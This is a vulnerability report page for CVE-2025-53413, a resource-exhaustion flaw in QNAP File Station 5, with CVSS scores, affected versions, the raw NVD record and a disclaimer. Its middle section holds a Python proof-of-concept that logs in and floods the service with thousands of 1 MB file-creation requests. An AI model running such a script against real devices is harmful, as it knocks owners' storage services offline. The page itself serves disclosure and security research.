Security Vulnerability Report
中文
CVE-2025-53413 CVSS 6.5 MEDIUM

CVE-2025-53413

Published: 2025-11-07 16:15:40
Last Modified: 2025-11-14 20:11:22
Source: [email protected]

Description

An allocation of resources without limits or throttling vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource. We have already fixed the vulnerability in the following version: File Station 5 5.5.6.5018 and later

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:qnap:file_station:*:*:*:*:*:*:*:* - VULNERABLE
File Station 5 < 5.5.6.5018

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-53413 PoC - Resource Exhaustion Attack # Target: QNAP File Station 5 # Requirement: Valid user credentials import requests import time import threading TARGET_URL = "https://<qnap-ip>/cgi-bin/filestation/cgi.fcgi" USERNAME = "attacker_account" PASSWORD = "attacker_password" def resource_exhaustion_attack(): """ Simulate resource exhaustion by repeatedly creating files This PoC demonstrates the vulnerability concept """ session = requests.Session() # Login to File Station login_data = { "app": "FileStation", "method": "login", "username": USERNAME, "password": PASSWORD } response = session.post(TARGET_URL, json=login_data) if response.status_code != 200: print("[-] Login failed") return print("[+] Logged in successfully") # Create many files to exhaust resources for i in range(10000): create_file_data = { "app": "FileStation", "method": "createFile", "path": f"/share/Multimedia/test_{i}.txt", "content": "A" * 1024 * 1024 # 1MB file } try: response = session.post(TARGET_URL, json=create_file_data, timeout=5) if i % 100 == 0: print(f"[*] Created {i} files") except requests.exceptions.Timeout: print("[!] Service appears to be overwhelmed") break print("[+] Attack completed") # Run the attack if __name__ == "__main__": resource_exhaustion_attack()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53413", "sourceIdentifier": "[email protected]", "published": "2025-11-07T16:15:39.930", "lastModified": "2025-11-14T20:11:21.673", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An allocation of resources without limits or throttling vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5018 and later"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:file_station:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5.6.4691", "versionEndExcluding": "5.5.6.5018", "matchCriteriaId": "A8CD1AA7-AC4B-4100-9789-50556BA83F52"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-25-38", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.